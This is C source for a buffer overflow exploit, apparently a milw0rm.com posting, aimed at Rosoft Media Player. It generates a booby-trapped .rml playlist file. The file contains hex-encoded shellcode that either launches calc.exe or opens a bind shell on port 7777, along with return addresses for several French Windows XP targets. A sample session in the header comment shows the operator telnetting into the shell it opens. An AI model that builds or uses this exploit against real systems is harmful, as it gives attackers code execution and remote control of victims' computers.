/* rsmpf.c * Rosoft media player free local buffer overflow Exploit multi targets * Coded By : * SimO-s0fT (Maroc-anti-connexion@hotmail.com) * thanks To : Stack & fl0 fl0w & SKD * and special thanks to str0ke for his advices and support ( you are the best brotha ) * example : * ########################################################################################## # Coded By SimO-s0fT # * # 0 [*]Microsoft Windows Trust SP3 (Frensh):ESP # * # 1 [*]Microsoft Windows Trust SP2 (Frensh):ESP # * # 2 [*]Microsoft Windows XP SP3 (Frensh) : ESP # * # 3 [*]Microsoft Windows XP SP2 (Frensh) : ESP # * # USAGE : # * # exploit1.exe file.rml platform # * # more information contact me { Maroc-anti-connexion[at]hotmail[dot]com } # * # failed...: No such file or directory # * # C:\Documents and Settings\The Fanopsis\Bureau>exploit1 simo.rml 0 # * # [1] execute calc.exe # * # [2] execute bindshell LPORT=7777 # * # Choose a neumber : 2 # * # simo.rml has been created! # * # C:\Documents and Settings\The Fanopsis\Bureau>telnet 41.250.22.124 7777 # * # Console - Windows Trust 3.0 (Service Pack 3: v55 # * # # * # (C) 1985-2008 Microsoft Corp. # * # # * # # * # C:\Documents and Settings\The Fanopsis\Bureau> # * ########################################################################################## * ********************************************************************************************************/ #include #include #include #define OFFSET 4096 // calc (pour tester l'exploit) char scode1[]= "\x29\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xa9" "\x21\xdb\x5b\x83\xeb\xfc\xe2\xf4\x55\xc9\x9f\x5b\xa9\x21\x50\x1e" "\x95\xaa\xa7\x5e\xd1\x20\x34\xd0\xe6\x39\x50\x04\x89\x20\x30\x12" "\x22\x15\x50\x5a\x47\x10\x1b\xc2\x05\xa5\x1b\x2f\xae\xe0\x11\x56" "\xa8\xe3\x30\xaf\x92\x75\xff\x5f\xdc\xc4\x50\x04\x8d\x20\x30\x3d" "\x22\x2d\x90\xd0\xf6\x3d\xda\xb0\x22\x3d\x50\x5a\x42\xa8\x87\x7f" "\xad\xe2\xea\x9b\xcd\xaa\x9b\x6b\x2c\xe1\xa3\x57\x22\x61\xd7\xd0" "\xd9\x3d\x76\xd0\xc1\x29\x30\x52\x22\xa1\x6b\x5b\xa9\x21\x50\x33" "\x95\x7e\xea\xad\xc9\x77\x52\xa3\x2a\xe1\xa0\x0b\xc1\xd1\x51\x5f" "\xf6\x49\x43\xa5\x23\x2f\x8c\xa4\x4e\x42\xba\x37\xca\x0f\xbe\x23" "\xcc\x21\xdb\x5b"; //bind shell LPORT 7777 char scode2[] = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49" "\x49\x49\x49\x37\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x61" "\x58\x30\x42\x31\x50\x42\x41\x6b\x41\x41\x71\x32\x41\x42\x41\x32" "\x42\x41\x30\x42\x41\x58\x38\x41\x42\x50\x75\x6d\x39\x4b\x4c\x32" "\x4a\x5a\x4b\x50\x4d\x6d\x38\x6b\x49\x49\x6f\x59\x6f\x39\x6f\x35" "\x30\x6c\x4b\x70\x6c\x65\x74\x37\x54\x4c\x4b\x42\x65\x47\x4c\x6e" "\x6b\x31\x6c\x46\x65\x33\x48\x43\x31\x48\x6f\x6c\x4b\x70\x4f\x65" "\x48\x6c\x4b\x73\x6f\x35\x70\x37\x71\x38\x6b\x31\x59\x4c\x4b\x46" "\x54\x6e\x6b\x53\x31\x58\x6e\x30\x31\x6f\x30\x4f\x69\x4e\x4c\x4b" "\x34\x49\x50\x41\x64\x46\x67\x49\x51\x7a\x6a\x46\x6d\x43\x31\x48" "\x42\x5a\x4b\x38\x74\x47\x4b\x30\x54\x64\x64\x51\x38\x42\x55\x4b" "\x55\x4e\x6b\x53\x6f\x51\x34\x43\x31\x4a\x4b\x50\x66\x4e\x6b\x46" "\x6c\x42\x6b\x4c\x4b\x73\x6f\x75\x4c\x33\x31\x5a\x4b\x65\x53\x34" "\x6c\x6e\x6b\x6d\x59\x30\x6c\x57\x54\x55\x4c\x55\x31\x4b\x73\x74" "\x71\x69\x4b\x65\x34\x6e\x6b\x43\x73\x74\x70\x6c\x4b\x67\x30\x46" "\x6c\x6c\x4b\x70\x70\x67\x6c\x6e\x4d\x6c\x4b\x57\x30\x44\x48\x71" "\x4e\x72\x48\x4e\x6e\x50\x4e\x54\x4e\x38\x6c\x70\x50\x4b\x4f\x4e" "\x36\x71\x76\x41\x43\x31\x76\x31\x78\x76\x53\x30\x32\x53\x58\x30" "\x77\x44\x33\x57\x42\x63\x6f\x70\x54\x6b\x4f\x48\x50\x73\x58\x58" "\x4b\x58\x6d\x6b\x4c\x57\x4b\x70\x50\x6b\x4f\x6a\x76\x71\x4f\x6d" "\x59\x4b\x55\x65\x36\x6c\x41\x68\x6d\x53\x38\x63\x32\x42\x75\x51" "\x7a\x36\x62\x59\x6f\x58\x50\x71\x78\x4a\x79\x34\x49\x4b\x45\x6e" "\x4d\x30\x57\x69\x6f\x4e\x36\x52\x73\x41\x43\x62\x73\x76\x33\x51" "\x43\x70\x43\x43\x63\x73\x73\x36\x33\x6b\x4f\x4a\x70\x75\x36\x41" "\x78\x75\x4e\x71\x71\x35\x36\x42\x73\x4b\x39\x79\x71\x6c\x55\x70" "\x68\x4f\x54\x75\x4a\x32\x50\x39\x57\x52\x77\x69\x6f\x38\x56\x70" "\x6a\x72\x30\x50\x51\x53\x65\x4b\x4f\x58\x50\x55\x38\x6c\x64\x4c" "\x6d\x34\x6e\x49\x79\x66\x37\x6b\x4f\x4e\x36\x50\x53\x30\x55\x69" "\x6f\x4a\x70\x53\x58\x7a\x45\x41\x59\x4e\x66\x37\x39\x36\x37\x69" "\x6f\x59\x46\x72\x70\x50\x54\x31\x44\x33\x65\x4b\x4f\x5a\x70\x4f" "\x63\x51\x78\x38\x67\x50\x79\x38\x46\x43\x49\x32\x77\x4b\x4f\x4b" "\x66\x62\x75\x79\x6f\x6a\x70\x45\x36\x30\x6a\x52\x44\x30\x66\x41" "\x78\x32\x43\x72\x4d\x6f\x79\x6d\x35\x62\x4a\x42\x70\x70\x59\x74" "\x69\x5a\x6c\x6c\x49\x6b\x57\x41\x7a\x32\x64\x6b\x39\x68\x62\x30" "\x31\x6f\x30\x6b\x43\x6e\x4a\x6b\x4e\x51\x52\x34\x6d\x49\x6e\x62" "\x62\x36\x4c\x5a\x33\x6c\x4d\x71\x6a\x65\x68\x6e\x4b\x4c\x6b\x4e" "\x4b\x55\x38\x30\x72\x59\x6e\x4c\x73\x37\x66\x4b\x4f\x30\x75\x63" "\x74\x39\x6f\x6e\x36\x33\x6b\x36\x37\x72\x72\x31\x41\x31\x41\x46" "\x31\x50\x6a\x55\x51\x31\x41\x41\x41\x32\x75\x42\x71\x39\x6f\x48" "\x50\x50\x68\x6c\x6d\x39\x49\x45\x55\x78\x4e\x30\x53\x39\x6f\x6b" "\x66\x62\x4a\x79\x6f\x39\x6f\x47\x47\x39\x6f\x58\x50\x4e\x6b\x50" "\x57\x4b\x4c\x6c\x43\x4b\x74\x70\x64\x6b\x4f\x6a\x76\x41\x42\x49" "\x6f\x58\x50\x30\x68\x68\x6f\x6a\x6e\x4b\x50\x31\x70\x42\x73\x49" "\x6f\x58\x56\x49\x6f\x78\x50\x61"; struct adresses {char *platform; unsigned long addr; } systems[]= { {"[*]Microsoft Windows Trust SP3 (Frensh):ESP",0x7D60DECB }, {"[*]Microsoft Windows Trust SP2 (Frensh):ESP",0x7C85D569 }, {"[*]Microsoft Windows XP SP3 (Frensh) : ESP" ,0x7E498C6B }, {"[*]Microsoft Windows XP SP2 (Frensh) : ESP" ,0x7C82385D }, {NULL }, }; char NOP1[]="\x90\x90\x90\x90";// n0t working char NOP2[]="\x90\x90\x90\x90\x90\x90\x90\x90"; int main(int argc,char *argv[]){ FILE *s; unsigned char *buffer; unsigned int RET= systems[atoi(argv[2])].addr; unsigned char bchars[]="\xF0\xFF\xFD\x7F"; int i; int number; int offset=0; if (argc <2){ system("cls"); printf("Coded By SimO-s0fT\n"); for(i=0;systems[i].platform;i++) printf("%d \t\t %s\n",i,systems[i].platform); printf("USAGE : \n\t"); printf(argv[0]); printf(".exe "); printf("file.rml "); printf("platform\n"); printf("more information contact me { Maroc-anti-connexion[at]hotmail[dot]com }\n"); } if ((s=fopen(argv[1],"wb"))==NULL){ perror("failed..."); exit(0); } printf("[1] execute calc.exe\n"); printf("[2] execute bindshell LPORT=7777\n"); printf(" Choose a neumber : "); scanf("%d",&number); switch(number){ case 1: buffer=(unsigned char *) malloc (OFFSET+strlen(bchars)+strlen(NOP1)+4+strlen(NOP2)+strlen(scode1)); memset(buffer,0x90,OFFSET+strlen(bchars)+strlen(NOP1)+4+strlen(NOP2)+strlen(scode1)); offset=OFFSET; memcpy(buffer+offset,bchars,strlen(bchars)); offset+=strlen(bchars); memcpy(buffer+offset,NOP1,strlen(NOP1)); offset+=strlen(NOP1); memcpy(buffer+offset,&RET,4); offset+=4; memcpy(buffer+offset,NOP2,strlen(NOP2)); offset+=strlen(NOP2); memcpy(buffer+offset,scode1,strlen(scode1)); offset+=strlen(scode1); fputs(buffer,s); fclose(s); printf("%s has been created!",argv[1]); free(buffer); break; case 2: buffer=(unsigned char *) malloc (OFFSET+strlen(bchars)+strlen(NOP1)+4+strlen(NOP2)+strlen(scode2)); memset(buffer,0x90,OFFSET+strlen(bchars)+strlen(NOP1)+4+strlen(NOP2)+strlen(scode2)); offset=OFFSET; memcpy(buffer+offset,bchars,strlen(bchars)); offset+=strlen(bchars); memcpy(buffer+offset,NOP1,strlen(NOP1)); offset+=strlen(NOP1); memcpy(buffer+offset,&RET,4); offset+=4; memcpy(buffer+offset,NOP2,strlen(NOP2)); offset+=strlen(NOP2); memcpy(buffer+offset,scode2,strlen(scode2)); offset+=strlen(scode2); fputs(buffer,s); fclose(s); printf("%s has been created!",argv[1]); free(buffer); break; } return 0; } // milw0rm.com [2009-03-16]